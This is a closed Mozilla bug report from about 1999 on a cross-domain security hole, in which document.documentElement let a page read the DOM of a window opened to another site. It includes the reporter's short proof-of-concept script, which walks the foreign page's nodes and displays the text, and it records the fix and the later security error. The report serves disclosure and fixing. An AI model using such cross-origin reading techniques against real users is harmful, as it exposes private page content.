Closed Bug 16036 Opened 20 years ago Closed 20 years ago

[DOGFOOD] document.Element exposes the DOM of documents from any domain

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

(Whiteboard: [PDT+])

"document.Element" exposes the DOM of documents from any domain which allows at
least reading the whole content of the document.
The code is:
---------------------------------------------------------------
<SCRIPT>
function f(o)
{
 var s='';
 var i;
 s = o.nodeValue;
 if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
       s += f(o.childNodes[i]);
return s;
}
a=window.open("http://www.yahoo.com");
setTimeout("s=f(a.document.documentElement);alert(s);",10000);
</SCRIPT>
Status: NEW → ASSIGNED
Blocks: 16950
No longer blocks: 16950
Target Milestone: M12
Summary: document.Element exposes the DOM of documents from any domain → [dogfood] document.Element exposes the DOM of documents from any domain
Marking dogfood for analysis by PDT at jar's request.
Summary: [dogfood] document.Element exposes the DOM of documents from any domain → [DOGFOOD] document.Element exposes the DOM of documents from any domain
Whiteboard: [PDT+]
Putting on PDT+ radar.
Status: ASSIGNED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT (1999112908) Com:
Javascript Error: access disallowed from scripts at
http://www.nat.bg/~joro/mozilla/docel.html to documents at another domain
URL: http://www.nat.bg/~joro/mozilla/docel.html
LineNo: 16

Javascript Error: uncaught exception: [Exception... "Security error" code:
"1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location:
"http://www.nat.bg/~joro/mozilla/docel.html Line: 16"]
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.